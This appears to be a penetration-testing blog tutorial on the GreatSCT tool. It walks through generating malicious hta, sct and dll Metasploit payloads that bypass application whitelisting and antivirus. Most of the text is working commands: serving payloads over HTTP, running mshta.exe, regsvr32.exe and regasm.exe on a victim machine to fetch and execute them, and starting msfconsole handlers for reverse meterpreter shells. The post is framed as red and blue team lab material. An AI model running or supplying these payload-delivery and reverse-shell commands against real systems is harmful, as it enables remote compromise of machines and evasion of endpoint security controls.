While writing Applocker bypass series, we found a new tool which was specially designed for bypassing whitelisting application.  So I decided to write this article where we are introducing another most interesting tool “Great SCT –A Metasploit payload generator” tool which is similar to Unicorn or msfvenom because it depends on the Metasploit framework to provide reverse connection of the victim’s machine. So let’s began with its tutorial and check its functionality.

Table of Content

• GreatSCT
• Installation & Usages
• Generate malicious hta file
• Generate malicious sct file
• Generate malicious dll file

GreatSCT

GreatSCT is current under support by @ConsciousHacker, the project is called Great SCT (Great Scott). Great SCT is an open source project to generate application whitelist bypasses. This tool is intended for BOTH red and blue team. It is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.

You can download it from here: //github.com/GreatSCT/GreatSCT

Installation & Usages

It must first be downloaded and installed in order to start using Great SCT. Run the following command to download Great SCT from github and also take care of its dependency tools while installing it.

This help to bypass Applocker policy by using the following tools:

• Installutil.exe : The Installer tool is a command- line tool that lets you install and uninstall server resources in specific assemblies by running the installer components.
• Msbuild.exe : The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild.
• Mshta.exe : Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with.
• Regasm.exe : The Assembly Registration tool reads the metadata within an assembly and adds the necessary entries to the registry, which allows COM clients to create .NET Framework classes transparently. 
• Regsvcs.exe : RegSvcs stands for Microsoft .NET Remote Registry Services it is known for .NET Services Installation.
• Regsvr32.exe : Regsvr32 is a command line utility for register and unregister OLE controls in the Windows Registry, such as DLLs and ActiveX controls.

git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT
cd setup
./setup.sh

Once it’s downloaded, type the following command to access the help commands:

use Bypass

Now to get the list of payloads type :

list

Generate malicious hta file 

Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :

use mshta/shellcode_inject/base64_migrate.py

Once the command is executed, type :

generate

After executing the generate command, it asks you which method you want to use. As we will use msfvenom type 1 to choose the first option. Then click enter for meterpreter. Then supply lhost and lport, i.e. 192.168.1.107, 4321 respectively.

When generating the shellcode, it will ask you to give a name for a payload. By default, it will take ‘payload’ as name. As I didn’t want to give any name, I simply pressed enter.

Now, it made two files. One resource file and other an hta file.

Now, firstly, start the python’s server in /usr/share/greatsct-output/source by typing:

python -m SimpleHTTPServer 80

Now execute the hta file in the command prompt of the victim’s PC.

mshta.exe //192.168.1.107/payload.hta

Simultaneously, start the multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using mshta.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious sct file 

Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :

use regsvr32/shellcode_inject/base64_migrate.py

Once the command is executed, type :

generate

Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the given port (any) as here you can see in the image below that we have given lport as 2345

After giving the details, it will ask you name for your malware. By default, it will set name ‘payload’ so either you can give the name or just press enter for the default settings.

And just as you press enter it will generate two files. One of them will a resource file and others will be .sct file. Now start the python’s server in /usr/share/greatsct-output/source by typing:

python -m SimpleHTTPServer 80

Now execute the .sct file in the run window of the victim’s PC as shown below

regsvr32.exe /s /u /n /i://192.168.1.107/payload.sct

Simultaneously, start the multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious dll file 

Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :

use regasm/meterpreter/rev_tcp.py

Once the command is executed, type:

set lhost 192.168.1.107
generate

After giving the details, it will ask you a name for your malware. By default, it will set name ‘payload’ so either you can give the name or just press enter for the default settings.

And just as you press enter it will generate dll files. 

Now start the python’s server in /usr/share/greatsct-output/compiled by typing:

python -m SimpleHTTPServer 80

Now place above generated dll file inside : C:\Windows\Microsoft.NET\Framework\v4.0.30319\v4.0.30319\ and then  execute the .dll file in the run window of the victim’s PC as shown below:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll

Simultaneously, start the multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here